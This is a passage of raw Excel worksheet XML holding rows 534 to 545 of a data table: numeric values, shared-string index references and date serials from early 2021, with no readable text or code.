        <v>9550</v>
      </c>
      <c r="BD534" t="s">
        <v>10331</v>
      </c>
    </row>
    <row r="535" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A535">
        <v>1612</v>
      </c>
      <c r="B535" t="s">
        <v>4312</v>
      </c>
      <c r="C535" t="s">
        <v>129</v>
      </c>
      <c r="D535" t="s">
        <v>4313</v>
      </c>
      <c r="E535" t="s">
        <v>111</v>
      </c>
      <c r="F535" t="s">
        <v>4314</v>
      </c>
      <c r="G535" s="1">
        <v>44274</v>
      </c>
      <c r="H535">
        <v>9040</v>
      </c>
      <c r="I535">
        <v>9040</v>
      </c>
      <c r="J535">
        <v>0</v>
      </c>
      <c r="K535">
        <v>1</v>
      </c>
      <c r="L535">
        <v>0</v>
      </c>
      <c r="M535">
        <v>0</v>
      </c>
      <c r="N535">
        <v>0</v>
      </c>
      <c r="O535">
        <v>0</v>
      </c>
      <c r="P535">
        <v>0</v>
      </c>
      <c r="Q535">
        <v>0</v>
      </c>
      <c r="R535">
        <v>0</v>
      </c>
      <c r="S535">
        <v>1</v>
      </c>
      <c r="T535">
        <v>0</v>
      </c>
      <c r="U535">
        <v>0</v>
      </c>
      <c r="V535">
        <v>200</v>
      </c>
      <c r="W535">
        <v>0</v>
      </c>
      <c r="X535">
        <v>0</v>
      </c>
      <c r="Y535">
        <v>0</v>
      </c>
      <c r="Z535">
        <v>0</v>
      </c>
      <c r="AA535">
        <v>0</v>
      </c>
      <c r="AB535">
        <v>0</v>
      </c>
      <c r="AC535">
        <v>0</v>
      </c>
      <c r="AD535">
        <v>1</v>
      </c>
      <c r="AE535">
        <v>0</v>
      </c>
      <c r="AF535" t="s">
        <v>4315</v>
      </c>
      <c r="AG535">
        <v>15710</v>
      </c>
      <c r="AH535">
        <v>11</v>
      </c>
      <c r="AJ535">
        <v>268</v>
      </c>
      <c r="AK535" t="s">
        <v>277</v>
      </c>
      <c r="AL535" t="s">
        <v>278</v>
      </c>
      <c r="AM535" t="s">
        <v>4316</v>
      </c>
      <c r="AN535" t="s">
        <v>55</v>
      </c>
      <c r="AO535">
        <v>2017</v>
      </c>
      <c r="AP535" t="s">
        <v>4317</v>
      </c>
      <c r="AQ535" t="s">
        <v>4318</v>
      </c>
      <c r="AR535" t="s">
        <v>4319</v>
      </c>
      <c r="AS535" t="s">
        <v>179</v>
      </c>
      <c r="AT535" t="s">
        <v>58</v>
      </c>
      <c r="AU535">
        <v>24</v>
      </c>
      <c r="AV535">
        <v>2</v>
      </c>
      <c r="AW535">
        <v>2</v>
      </c>
      <c r="AX535">
        <v>0</v>
      </c>
      <c r="AY535">
        <v>12</v>
      </c>
      <c r="AZ535">
        <v>8</v>
      </c>
      <c r="BA535" t="s">
        <v>16949</v>
      </c>
      <c r="BB535" t="s">
        <v>15404</v>
      </c>
      <c r="BC535" t="s">
        <v>13224</v>
      </c>
      <c r="BD535">
        <v>0</v>
      </c>
    </row>
    <row r="536" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A536">
        <v>1543</v>
      </c>
      <c r="B536" t="s">
        <v>4320</v>
      </c>
      <c r="C536" t="s">
        <v>318</v>
      </c>
      <c r="D536" t="s">
        <v>4321</v>
      </c>
      <c r="E536" t="s">
        <v>142</v>
      </c>
      <c r="F536" t="s">
        <v>4322</v>
      </c>
      <c r="G536" s="1">
        <v>44273</v>
      </c>
      <c r="H536">
        <v>9048</v>
      </c>
      <c r="I536">
        <v>9048</v>
      </c>
      <c r="J536">
        <v>2</v>
      </c>
      <c r="K536">
        <v>1</v>
      </c>
      <c r="L536">
        <v>2</v>
      </c>
      <c r="M536">
        <v>1</v>
      </c>
      <c r="N536">
        <v>0</v>
      </c>
      <c r="O536">
        <v>0</v>
      </c>
      <c r="P536">
        <v>0</v>
      </c>
      <c r="Q536">
        <v>5</v>
      </c>
      <c r="R536">
        <v>5</v>
      </c>
      <c r="S536">
        <v>0</v>
      </c>
      <c r="T536">
        <v>1</v>
      </c>
      <c r="U536">
        <v>65000</v>
      </c>
      <c r="V536">
        <v>1000</v>
      </c>
      <c r="W536">
        <v>4000</v>
      </c>
      <c r="X536">
        <v>800</v>
      </c>
      <c r="Y536">
        <v>0</v>
      </c>
      <c r="Z536">
        <v>0</v>
      </c>
      <c r="AA536">
        <v>0</v>
      </c>
      <c r="AB536">
        <v>1000</v>
      </c>
      <c r="AC536">
        <v>1500</v>
      </c>
      <c r="AD536">
        <v>0</v>
      </c>
      <c r="AE536">
        <v>1000</v>
      </c>
      <c r="AF536" t="s">
        <v>4323</v>
      </c>
      <c r="AG536">
        <v>90221</v>
      </c>
      <c r="AH536">
        <v>26</v>
      </c>
      <c r="AJ536">
        <v>420</v>
      </c>
      <c r="AK536" t="s">
        <v>861</v>
      </c>
      <c r="AL536" t="s">
        <v>4324</v>
      </c>
      <c r="AM536" t="s">
        <v>4325</v>
      </c>
      <c r="AN536" t="s">
        <v>55</v>
      </c>
      <c r="AO536">
        <v>2011</v>
      </c>
      <c r="AP536">
        <v>81242284628</v>
      </c>
      <c r="AQ536" t="s">
        <v>4326</v>
      </c>
      <c r="AR536" t="s">
        <v>4323</v>
      </c>
      <c r="AS536" t="s">
        <v>71</v>
      </c>
      <c r="AT536" t="s">
        <v>58</v>
      </c>
      <c r="AU536">
        <v>25</v>
      </c>
      <c r="AV536">
        <v>1</v>
      </c>
      <c r="AW536">
        <v>13</v>
      </c>
      <c r="AX536">
        <v>26</v>
      </c>
      <c r="AY536">
        <v>10</v>
      </c>
      <c r="AZ536">
        <v>11</v>
      </c>
      <c r="BA536" t="s">
        <v>16930</v>
      </c>
      <c r="BB536" t="s">
        <v>15353</v>
      </c>
      <c r="BC536" t="s">
        <v>9550</v>
      </c>
      <c r="BD536" t="s">
        <v>13181</v>
      </c>
    </row>
    <row r="537" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A537">
        <v>1655</v>
      </c>
      <c r="B537" t="s">
        <v>4327</v>
      </c>
      <c r="C537" t="s">
        <v>88</v>
      </c>
      <c r="D537" t="s">
        <v>4328</v>
      </c>
      <c r="E537" t="s">
        <v>944</v>
      </c>
      <c r="F537" t="s">
        <v>1651</v>
      </c>
      <c r="G537" s="1">
        <v>44272</v>
      </c>
      <c r="H537">
        <v>9058</v>
      </c>
      <c r="I537">
        <v>9058</v>
      </c>
      <c r="J537">
        <v>0</v>
      </c>
      <c r="K537">
        <v>3</v>
      </c>
      <c r="L537">
        <v>1</v>
      </c>
      <c r="M537">
        <v>4</v>
      </c>
      <c r="N537">
        <v>0</v>
      </c>
      <c r="O537">
        <v>0</v>
      </c>
      <c r="P537">
        <v>4</v>
      </c>
      <c r="Q537">
        <v>0</v>
      </c>
      <c r="R537">
        <v>15</v>
      </c>
      <c r="S537">
        <v>1</v>
      </c>
      <c r="T537">
        <v>2</v>
      </c>
      <c r="U537">
        <v>0</v>
      </c>
      <c r="V537">
        <v>3</v>
      </c>
      <c r="W537">
        <v>7000</v>
      </c>
      <c r="X537">
        <v>100</v>
      </c>
      <c r="Y537">
        <v>0</v>
      </c>
      <c r="Z537">
        <v>0</v>
      </c>
      <c r="AA537">
        <v>14400</v>
      </c>
      <c r="AB537">
        <v>0</v>
      </c>
      <c r="AC537">
        <v>200000</v>
      </c>
      <c r="AD537">
        <v>1</v>
      </c>
      <c r="AE537">
        <v>400000</v>
      </c>
      <c r="AF537" t="s">
        <v>4329</v>
      </c>
      <c r="AG537">
        <v>82251</v>
      </c>
      <c r="AH537">
        <v>17</v>
      </c>
      <c r="AJ537">
        <v>274</v>
      </c>
      <c r="AK537" t="s">
        <v>1058</v>
      </c>
      <c r="AL537" t="s">
        <v>1457</v>
      </c>
      <c r="AM537" t="s">
        <v>4330</v>
      </c>
      <c r="AN537" t="s">
        <v>55</v>
      </c>
      <c r="AO537">
        <v>1998</v>
      </c>
      <c r="AP537" t="s">
        <v>4331</v>
      </c>
      <c r="AQ537" t="s">
        <v>4332</v>
      </c>
      <c r="AR537" t="s">
        <v>4329</v>
      </c>
      <c r="AS537" t="s">
        <v>71</v>
      </c>
      <c r="AT537" t="s">
        <v>58</v>
      </c>
      <c r="AU537">
        <v>25</v>
      </c>
      <c r="AV537">
        <v>1</v>
      </c>
      <c r="AW537">
        <v>64</v>
      </c>
      <c r="AX537">
        <v>53</v>
      </c>
      <c r="AY537">
        <v>15</v>
      </c>
      <c r="AZ537">
        <v>17</v>
      </c>
      <c r="BA537" t="s">
        <v>16964</v>
      </c>
      <c r="BB537" t="s">
        <v>15429</v>
      </c>
      <c r="BC537" t="s">
        <v>13173</v>
      </c>
      <c r="BD537" t="s">
        <v>10469</v>
      </c>
    </row>
    <row r="538" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A538">
        <v>1272</v>
      </c>
      <c r="B538" t="s">
        <v>4333</v>
      </c>
      <c r="C538" t="s">
        <v>157</v>
      </c>
      <c r="D538" t="s">
        <v>4334</v>
      </c>
      <c r="E538" t="s">
        <v>142</v>
      </c>
      <c r="F538" t="s">
        <v>4335</v>
      </c>
      <c r="G538" s="1">
        <v>44307</v>
      </c>
      <c r="H538">
        <v>9064</v>
      </c>
      <c r="I538">
        <v>9064</v>
      </c>
      <c r="J538">
        <v>1</v>
      </c>
      <c r="K538">
        <v>0</v>
      </c>
      <c r="L538">
        <v>1</v>
      </c>
      <c r="M538">
        <v>0</v>
      </c>
      <c r="N538">
        <v>0</v>
      </c>
      <c r="O538">
        <v>0</v>
      </c>
      <c r="P538">
        <v>0</v>
      </c>
      <c r="Q538">
        <v>1</v>
      </c>
      <c r="R538">
        <v>2</v>
      </c>
      <c r="S538">
        <v>0</v>
      </c>
      <c r="T538">
        <v>1</v>
      </c>
      <c r="U538">
        <v>50000</v>
      </c>
      <c r="V538">
        <v>0</v>
      </c>
      <c r="W538">
        <v>3000</v>
      </c>
      <c r="X538">
        <v>0</v>
      </c>
      <c r="Y538">
        <v>0</v>
      </c>
      <c r="Z538">
        <v>0</v>
      </c>
      <c r="AA538">
        <v>0</v>
      </c>
      <c r="AB538">
        <v>1000</v>
      </c>
      <c r="AC538">
        <v>2000</v>
      </c>
      <c r="AD538">
        <v>0</v>
      </c>
      <c r="AE538">
        <v>3000</v>
      </c>
      <c r="AF538" t="s">
        <v>4336</v>
      </c>
      <c r="AG538">
        <v>61234</v>
      </c>
      <c r="AH538">
        <v>16</v>
      </c>
      <c r="AJ538">
        <v>242</v>
      </c>
      <c r="AK538" t="s">
        <v>1894</v>
      </c>
      <c r="AL538" t="s">
        <v>4337</v>
      </c>
      <c r="AM538" t="s">
        <v>4338</v>
      </c>
      <c r="AN538" t="s">
        <v>55</v>
      </c>
      <c r="AO538">
        <v>2006</v>
      </c>
      <c r="AP538" t="s">
        <v>4339</v>
      </c>
      <c r="AQ538">
        <v>81330270524</v>
      </c>
      <c r="AR538" t="s">
        <v>4340</v>
      </c>
      <c r="AS538" t="s">
        <v>71</v>
      </c>
      <c r="AT538" t="s">
        <v>58</v>
      </c>
      <c r="AU538">
        <v>26</v>
      </c>
      <c r="AV538">
        <v>1</v>
      </c>
      <c r="AW538">
        <v>9</v>
      </c>
      <c r="AX538">
        <v>5</v>
      </c>
      <c r="AY538">
        <v>6</v>
      </c>
      <c r="AZ538">
        <v>2</v>
      </c>
      <c r="BA538" t="s">
        <v>16835</v>
      </c>
      <c r="BB538" t="s">
        <v>15165</v>
      </c>
      <c r="BC538" t="s">
        <v>13193</v>
      </c>
      <c r="BD538">
        <v>0</v>
      </c>
    </row>
    <row r="539" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A539">
        <v>1177</v>
      </c>
      <c r="B539" t="s">
        <v>4341</v>
      </c>
      <c r="C539" t="s">
        <v>458</v>
      </c>
      <c r="D539" t="s">
        <v>4342</v>
      </c>
      <c r="E539" t="s">
        <v>843</v>
      </c>
      <c r="F539" t="s">
        <v>1368</v>
      </c>
      <c r="G539" s="1">
        <v>44299</v>
      </c>
      <c r="H539">
        <v>9070</v>
      </c>
      <c r="I539">
        <v>9070</v>
      </c>
      <c r="J539">
        <v>0</v>
      </c>
      <c r="K539">
        <v>0</v>
      </c>
      <c r="L539">
        <v>0</v>
      </c>
      <c r="M539">
        <v>0</v>
      </c>
      <c r="N539">
        <v>0</v>
      </c>
      <c r="O539">
        <v>0</v>
      </c>
      <c r="P539">
        <v>0</v>
      </c>
      <c r="Q539">
        <v>1</v>
      </c>
      <c r="R539">
        <v>5</v>
      </c>
      <c r="S539">
        <v>0</v>
      </c>
      <c r="T539">
        <v>0</v>
      </c>
      <c r="U539">
        <v>0</v>
      </c>
      <c r="V539">
        <v>0</v>
      </c>
      <c r="W539">
        <v>0</v>
      </c>
      <c r="X539">
        <v>0</v>
      </c>
      <c r="Y539">
        <v>0</v>
      </c>
      <c r="Z539">
        <v>0</v>
      </c>
      <c r="AA539">
        <v>0</v>
      </c>
      <c r="AB539">
        <v>400</v>
      </c>
      <c r="AC539">
        <v>2000</v>
      </c>
      <c r="AD539">
        <v>0</v>
      </c>
      <c r="AE539">
        <v>0</v>
      </c>
      <c r="AF539" t="s">
        <v>4341</v>
      </c>
      <c r="AG539">
        <v>29111</v>
      </c>
      <c r="AH539">
        <v>5</v>
      </c>
      <c r="AJ539">
        <v>154</v>
      </c>
      <c r="AK539" t="s">
        <v>3358</v>
      </c>
      <c r="AL539" t="s">
        <v>3358</v>
      </c>
      <c r="AM539" t="s">
        <v>4343</v>
      </c>
      <c r="AN539" t="s">
        <v>55</v>
      </c>
      <c r="AO539">
        <v>2009</v>
      </c>
      <c r="AP539">
        <v>8127007685</v>
      </c>
      <c r="AQ539" t="s">
        <v>4344</v>
      </c>
      <c r="AR539" t="s">
        <v>4341</v>
      </c>
      <c r="AS539" t="s">
        <v>71</v>
      </c>
      <c r="AT539" t="s">
        <v>58</v>
      </c>
      <c r="AU539">
        <v>28</v>
      </c>
      <c r="AV539">
        <v>0</v>
      </c>
      <c r="AW539">
        <v>0</v>
      </c>
      <c r="AX539">
        <v>0</v>
      </c>
      <c r="AY539">
        <v>11</v>
      </c>
      <c r="AZ539">
        <v>0</v>
      </c>
      <c r="BA539" t="s">
        <v>16814</v>
      </c>
      <c r="BB539" t="s">
        <v>15101</v>
      </c>
      <c r="BC539" t="s">
        <v>13324</v>
      </c>
      <c r="BD539" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="540" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A540">
        <v>1469</v>
      </c>
      <c r="B540" t="s">
        <v>4345</v>
      </c>
      <c r="C540" t="s">
        <v>99</v>
      </c>
      <c r="D540" t="s">
        <v>4346</v>
      </c>
      <c r="E540" t="s">
        <v>142</v>
      </c>
      <c r="F540" t="s">
        <v>2374</v>
      </c>
      <c r="G540" s="1">
        <v>44322</v>
      </c>
      <c r="H540">
        <v>9144</v>
      </c>
      <c r="I540">
        <v>9144</v>
      </c>
      <c r="J540">
        <v>5</v>
      </c>
      <c r="K540">
        <v>0</v>
      </c>
      <c r="L540">
        <v>1</v>
      </c>
      <c r="M540">
        <v>1</v>
      </c>
      <c r="N540">
        <v>0</v>
      </c>
      <c r="O540">
        <v>0</v>
      </c>
      <c r="P540">
        <v>0</v>
      </c>
      <c r="Q540">
        <v>1</v>
      </c>
      <c r="R540">
        <v>0</v>
      </c>
      <c r="S540">
        <v>0</v>
      </c>
      <c r="T540">
        <v>0</v>
      </c>
      <c r="U540">
        <v>200</v>
      </c>
      <c r="V540">
        <v>0</v>
      </c>
      <c r="W540">
        <v>2000</v>
      </c>
      <c r="X540">
        <v>2000</v>
      </c>
      <c r="Y540">
        <v>0</v>
      </c>
      <c r="Z540">
        <v>0</v>
      </c>
      <c r="AA540">
        <v>0</v>
      </c>
      <c r="AB540">
        <v>100</v>
      </c>
      <c r="AC540">
        <v>0</v>
      </c>
      <c r="AD540">
        <v>0</v>
      </c>
      <c r="AE540">
        <v>0</v>
      </c>
      <c r="AF540" t="s">
        <v>4347</v>
      </c>
      <c r="AG540">
        <v>14450</v>
      </c>
      <c r="AH540">
        <v>12</v>
      </c>
      <c r="AJ540">
        <v>160</v>
      </c>
      <c r="AK540" t="s">
        <v>396</v>
      </c>
      <c r="AL540" t="s">
        <v>115</v>
      </c>
      <c r="AM540" t="s">
        <v>4348</v>
      </c>
      <c r="AN540" t="s">
        <v>55</v>
      </c>
      <c r="AO540">
        <v>2018</v>
      </c>
      <c r="AP540" t="s">
        <v>4349</v>
      </c>
      <c r="AQ540" t="s">
        <v>4350</v>
      </c>
      <c r="AR540" t="s">
        <v>4347</v>
      </c>
      <c r="AS540" t="s">
        <v>187</v>
      </c>
      <c r="AT540" t="s">
        <v>58</v>
      </c>
      <c r="AU540">
        <v>24</v>
      </c>
      <c r="AV540">
        <v>0</v>
      </c>
      <c r="AW540">
        <v>4</v>
      </c>
      <c r="AX540">
        <v>0</v>
      </c>
      <c r="AY540">
        <v>4</v>
      </c>
      <c r="AZ540">
        <v>3</v>
      </c>
      <c r="BA540" t="s">
        <v>16907</v>
      </c>
      <c r="BB540" t="s">
        <v>15301</v>
      </c>
      <c r="BC540" t="s">
        <v>9550</v>
      </c>
      <c r="BD540" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="541" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A541">
        <v>1640</v>
      </c>
      <c r="B541" t="s">
        <v>4351</v>
      </c>
      <c r="C541" t="s">
        <v>2760</v>
      </c>
      <c r="D541" t="s">
        <v>4352</v>
      </c>
      <c r="E541" t="s">
        <v>363</v>
      </c>
      <c r="F541" t="s">
        <v>364</v>
      </c>
      <c r="G541" s="1">
        <v>44265</v>
      </c>
      <c r="H541">
        <v>9151</v>
      </c>
      <c r="I541">
        <v>9151</v>
      </c>
      <c r="J541">
        <v>0</v>
      </c>
      <c r="K541">
        <v>0</v>
      </c>
      <c r="L541">
        <v>0</v>
      </c>
      <c r="M541">
        <v>0</v>
      </c>
      <c r="N541">
        <v>0</v>
      </c>
      <c r="O541">
        <v>0</v>
      </c>
      <c r="P541">
        <v>0</v>
      </c>
      <c r="Q541">
        <v>0</v>
      </c>
      <c r="R541">
        <v>0</v>
      </c>
      <c r="S541">
        <v>0</v>
      </c>
      <c r="T541">
        <v>1</v>
      </c>
      <c r="U541">
        <v>0</v>
      </c>
      <c r="V541">
        <v>0</v>
      </c>
      <c r="W541">
        <v>0</v>
      </c>
      <c r="X541">
        <v>0</v>
      </c>
      <c r="Y541">
        <v>0</v>
      </c>
      <c r="Z541">
        <v>0</v>
      </c>
      <c r="AA541">
        <v>0</v>
      </c>
      <c r="AB541">
        <v>0</v>
      </c>
      <c r="AC541">
        <v>0</v>
      </c>
      <c r="AD541">
        <v>0</v>
      </c>
      <c r="AE541">
        <v>1000</v>
      </c>
      <c r="AF541" t="s">
        <v>4353</v>
      </c>
      <c r="AG541">
        <v>84171</v>
      </c>
      <c r="AH541">
        <v>18</v>
      </c>
      <c r="AJ541">
        <v>288</v>
      </c>
      <c r="AK541" t="s">
        <v>4354</v>
      </c>
      <c r="AL541" t="s">
        <v>4355</v>
      </c>
      <c r="AM541" t="s">
        <v>4356</v>
      </c>
      <c r="AN541" t="s">
        <v>55</v>
      </c>
      <c r="AO541">
        <v>2018</v>
      </c>
      <c r="AP541">
        <v>85205025971</v>
      </c>
      <c r="AQ541" t="s">
        <v>4357</v>
      </c>
      <c r="AR541" t="s">
        <v>4353</v>
      </c>
      <c r="AS541" t="s">
        <v>371</v>
      </c>
      <c r="AT541" t="s">
        <v>58</v>
      </c>
      <c r="AU541">
        <v>20</v>
      </c>
      <c r="AV541">
        <v>1</v>
      </c>
      <c r="AW541">
        <v>2</v>
      </c>
      <c r="AX541">
        <v>0</v>
      </c>
      <c r="AY541">
        <v>1</v>
      </c>
      <c r="AZ541">
        <v>1</v>
      </c>
      <c r="BA541" t="s">
        <v>16960</v>
      </c>
      <c r="BB541" t="s">
        <v>15420</v>
      </c>
      <c r="BC541">
        <v>0</v>
      </c>
      <c r="BD541" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="542" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A542">
        <v>1478</v>
      </c>
      <c r="B542" t="s">
        <v>4358</v>
      </c>
      <c r="C542" t="s">
        <v>318</v>
      </c>
      <c r="D542" t="s">
        <v>4359</v>
      </c>
      <c r="E542" t="s">
        <v>142</v>
      </c>
      <c r="F542" t="s">
        <v>1746</v>
      </c>
      <c r="G542" s="1">
        <v>44267</v>
      </c>
      <c r="H542">
        <v>9171</v>
      </c>
      <c r="I542">
        <v>9171</v>
      </c>
      <c r="J542">
        <v>1</v>
      </c>
      <c r="K542">
        <v>0</v>
      </c>
      <c r="L542">
        <v>0</v>
      </c>
      <c r="M542">
        <v>5</v>
      </c>
      <c r="N542">
        <v>0</v>
      </c>
      <c r="O542">
        <v>0</v>
      </c>
      <c r="P542">
        <v>0</v>
      </c>
      <c r="Q542">
        <v>10</v>
      </c>
      <c r="R542">
        <v>30</v>
      </c>
      <c r="S542">
        <v>0</v>
      </c>
      <c r="T542">
        <v>0</v>
      </c>
      <c r="U542">
        <v>100</v>
      </c>
      <c r="V542">
        <v>0</v>
      </c>
      <c r="W542">
        <v>0</v>
      </c>
      <c r="X542">
        <v>5000</v>
      </c>
      <c r="Y542">
        <v>0</v>
      </c>
      <c r="Z542">
        <v>0</v>
      </c>
      <c r="AA542">
        <v>0</v>
      </c>
      <c r="AB542">
        <v>400</v>
      </c>
      <c r="AC542">
        <v>12</v>
      </c>
      <c r="AD542">
        <v>0</v>
      </c>
      <c r="AE542">
        <v>0</v>
      </c>
      <c r="AF542" t="s">
        <v>4360</v>
      </c>
      <c r="AG542">
        <v>90242</v>
      </c>
      <c r="AH542">
        <v>26</v>
      </c>
      <c r="AJ542">
        <v>420</v>
      </c>
      <c r="AK542" t="s">
        <v>331</v>
      </c>
      <c r="AL542" t="s">
        <v>332</v>
      </c>
      <c r="AM542" t="s">
        <v>4361</v>
      </c>
      <c r="AN542" t="s">
        <v>55</v>
      </c>
      <c r="AO542">
        <v>1990</v>
      </c>
      <c r="AP542" t="s">
        <v>4362</v>
      </c>
      <c r="AQ542" t="s">
        <v>4363</v>
      </c>
      <c r="AR542" t="s">
        <v>4360</v>
      </c>
      <c r="AS542" t="s">
        <v>71</v>
      </c>
      <c r="AT542" t="s">
        <v>58</v>
      </c>
      <c r="AU542">
        <v>26</v>
      </c>
      <c r="AV542">
        <v>3</v>
      </c>
      <c r="AW542">
        <v>10</v>
      </c>
      <c r="AX542">
        <v>7</v>
      </c>
      <c r="AY542">
        <v>27</v>
      </c>
      <c r="AZ542">
        <v>132</v>
      </c>
      <c r="BA542" t="s">
        <v>16909</v>
      </c>
      <c r="BB542" t="s">
        <v>15309</v>
      </c>
      <c r="BC542">
        <v>0</v>
      </c>
      <c r="BD542" t="s">
        <v>12998</v>
      </c>
    </row>
    <row r="543" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A543">
        <v>1509</v>
      </c>
      <c r="B543" t="s">
        <v>4364</v>
      </c>
      <c r="C543" t="s">
        <v>47</v>
      </c>
      <c r="D543" t="s">
        <v>4365</v>
      </c>
      <c r="E543" t="s">
        <v>142</v>
      </c>
      <c r="F543" t="s">
        <v>666</v>
      </c>
      <c r="G543" s="1">
        <v>44260</v>
      </c>
      <c r="H543">
        <v>9178</v>
      </c>
      <c r="I543">
        <v>9178</v>
      </c>
      <c r="J543">
        <v>2</v>
      </c>
      <c r="K543">
        <v>0</v>
      </c>
      <c r="L543">
        <v>0</v>
      </c>
      <c r="M543">
        <v>0</v>
      </c>
      <c r="N543">
        <v>0</v>
      </c>
      <c r="O543">
        <v>0</v>
      </c>
      <c r="P543">
        <v>0</v>
      </c>
      <c r="Q543">
        <v>3</v>
      </c>
      <c r="R543">
        <v>0</v>
      </c>
      <c r="S543">
        <v>1</v>
      </c>
      <c r="T543">
        <v>0</v>
      </c>
      <c r="U543">
        <v>400000</v>
      </c>
      <c r="V543">
        <v>0</v>
      </c>
      <c r="W543">
        <v>0</v>
      </c>
      <c r="X543">
        <v>0</v>
      </c>
      <c r="Y543">
        <v>0</v>
      </c>
      <c r="Z543">
        <v>0</v>
      </c>
      <c r="AA543">
        <v>0</v>
      </c>
      <c r="AB543">
        <v>150</v>
      </c>
      <c r="AC543">
        <v>0</v>
      </c>
      <c r="AD543">
        <v>1</v>
      </c>
      <c r="AE543">
        <v>0</v>
      </c>
      <c r="AF543" t="s">
        <v>4366</v>
      </c>
      <c r="AG543">
        <v>20414</v>
      </c>
      <c r="AH543">
        <v>2</v>
      </c>
      <c r="AJ543">
        <v>53</v>
      </c>
      <c r="AK543" t="s">
        <v>2220</v>
      </c>
      <c r="AL543" t="s">
        <v>2221</v>
      </c>
      <c r="AM543" t="s">
        <v>4367</v>
      </c>
      <c r="AN543" t="s">
        <v>55</v>
      </c>
      <c r="AO543">
        <v>2000</v>
      </c>
      <c r="AP543" t="s">
        <v>4368</v>
      </c>
      <c r="AQ543" t="s">
        <v>4369</v>
      </c>
      <c r="AR543" t="s">
        <v>4366</v>
      </c>
      <c r="AS543" t="s">
        <v>179</v>
      </c>
      <c r="AT543" t="s">
        <v>58</v>
      </c>
      <c r="AU543">
        <v>26</v>
      </c>
      <c r="AV543">
        <v>1</v>
      </c>
      <c r="AW543">
        <v>10</v>
      </c>
      <c r="AX543">
        <v>2</v>
      </c>
      <c r="AY543">
        <v>8</v>
      </c>
      <c r="AZ543">
        <v>3</v>
      </c>
      <c r="BA543" t="s">
        <v>16918</v>
      </c>
      <c r="BB543" t="s">
        <v>15328</v>
      </c>
      <c r="BC543" t="s">
        <v>13200</v>
      </c>
      <c r="BD543">
        <v>0</v>
      </c>
    </row>
    <row r="544" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A544">
        <v>1206</v>
      </c>
      <c r="B544" t="s">
        <v>4370</v>
      </c>
      <c r="C544" t="s">
        <v>129</v>
      </c>
      <c r="D544" t="s">
        <v>4371</v>
      </c>
      <c r="E544" t="s">
        <v>826</v>
      </c>
      <c r="F544" t="s">
        <v>4372</v>
      </c>
      <c r="G544" s="1">
        <v>44284</v>
      </c>
      <c r="H544">
        <v>9200</v>
      </c>
      <c r="I544">
        <v>9200</v>
      </c>
      <c r="J544">
        <v>0</v>
      </c>
      <c r="K544">
        <v>1</v>
      </c>
      <c r="L544">
        <v>0</v>
      </c>
      <c r="M544">
        <v>0</v>
      </c>
      <c r="N544">
        <v>0</v>
      </c>
      <c r="O544">
        <v>0</v>
      </c>
      <c r="P544">
        <v>0</v>
      </c>
      <c r="Q544">
        <v>1</v>
      </c>
      <c r="R544">
        <v>0</v>
      </c>
      <c r="S544">
        <v>1</v>
      </c>
      <c r="T544">
        <v>1</v>
      </c>
      <c r="U544">
        <v>0</v>
      </c>
      <c r="V544">
        <v>50000</v>
      </c>
      <c r="W544">
        <v>0</v>
      </c>
      <c r="X544">
        <v>0</v>
      </c>
      <c r="Y544">
        <v>0</v>
      </c>
      <c r="Z544">
        <v>0</v>
      </c>
      <c r="AA544">
        <v>0</v>
      </c>
      <c r="AB544">
        <v>1</v>
      </c>
      <c r="AC544">
        <v>0</v>
      </c>
      <c r="AD544">
        <v>1</v>
      </c>
      <c r="AE544">
        <v>450000</v>
      </c>
      <c r="AF544" t="s">
        <v>4373</v>
      </c>
      <c r="AG544">
        <v>15710</v>
      </c>
      <c r="AH544">
        <v>11</v>
      </c>
      <c r="AJ544">
        <v>268</v>
      </c>
      <c r="AK544" t="s">
        <v>829</v>
      </c>
      <c r="AL544" t="s">
        <v>830</v>
      </c>
      <c r="AM544" t="s">
        <v>4374</v>
      </c>
      <c r="AN544" t="s">
        <v>55</v>
      </c>
      <c r="AO544">
        <v>2006</v>
      </c>
      <c r="AP544">
        <v>2168724638</v>
      </c>
      <c r="AQ544" t="s">
        <v>4373</v>
      </c>
      <c r="AR544" t="s">
        <v>4373</v>
      </c>
      <c r="AS544" t="s">
        <v>553</v>
      </c>
      <c r="AT544" t="s">
        <v>58</v>
      </c>
      <c r="AU544">
        <v>0</v>
      </c>
      <c r="AV544">
        <v>0</v>
      </c>
      <c r="AW544">
        <v>0</v>
      </c>
      <c r="AX544">
        <v>0</v>
      </c>
      <c r="AY544">
        <v>6</v>
      </c>
      <c r="AZ544">
        <v>5</v>
      </c>
      <c r="BA544" t="s">
        <v>17675</v>
      </c>
      <c r="BB544" t="s">
        <v>15122</v>
      </c>
      <c r="BC544" t="s">
        <v>9571</v>
      </c>
      <c r="BD544">
        <v>0</v>
      </c>
    </row>
    <row r="545" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A545">
        <v>1597</v>
      </c>
      <c r="B545" t="s">
        <v>4375</v>
      </c>
      <c r="C545" t="s">
        <v>47</v>
      </c>
      <c r="D545" t="s">
        <v>4376</v>
      </c>
      <c r="E545" t="s">
        <v>142</v>
      </c>
      <c r="F545" t="s">
        <v>4377</v>
      </c>
      <c r="G545" s="1">
        <v>44287</v>
      </c>
      <c r="H545">
        <v>9238</v>
      </c>
      <c r="I545">
        <v>9238</v>
      </c>
      <c r="J545">
        <v>2</v>
      </c>
      <c r="K545">
        <v>0</v>
      </c>
      <c r="L545">
        <v>0</v>
      </c>
      <c r="M545">
        <v>8</v>
      </c>
      <c r="N545">
        <v>0</v>
      </c>
      <c r="O545">
        <v>0</v>
      </c>
      <c r="P545">
        <v>0</v>
      </c>
      <c r="Q545">
        <v>0</v>
      </c>
      <c r="R545">
        <v>0</v>
      </c>
      <c r="S545">
        <v>1</v>
      </c>
      <c r="T545">
        <v>0</v>
      </c>
      <c r="U545">
        <v>200000</v>
      </c>
      <c r="V545">
        <v>0</v>
      </c>
      <c r="W545">
        <v>0</v>
      </c>
      <c r="X545">
        <v>40000</v>
      </c>
      <c r="Y545">
